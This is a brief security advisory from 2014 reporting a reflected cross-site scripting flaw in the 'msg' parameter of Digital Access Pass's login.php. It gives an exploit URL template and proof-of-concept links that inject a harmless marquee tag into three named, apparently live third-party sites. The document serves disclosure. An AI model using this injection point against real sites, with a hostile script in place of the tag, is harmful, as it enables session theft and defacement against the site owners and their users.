[+] Cross Site Scripting on Digital Acess Pass
[+] Date: 04/05/2014
[+] Risk: LOW
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://digitalaccesspass.com/
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: login.php
[+] Exploit : http://host/dap/login.php?msg=[XSS]
[+] PoC : http://sqi.co/dap/login.php?msg=<marquee> Felipe Andrian Peixoto
http://voiceacting.com/dap/login.php?msg=<marquee>Felipe Andrian Peixoto
http://masterclubprivado.com/dap/login.php?msg=<marquee>Felipe Andrian Peixoto
[+] Admin Page: http://host/dap/login.php
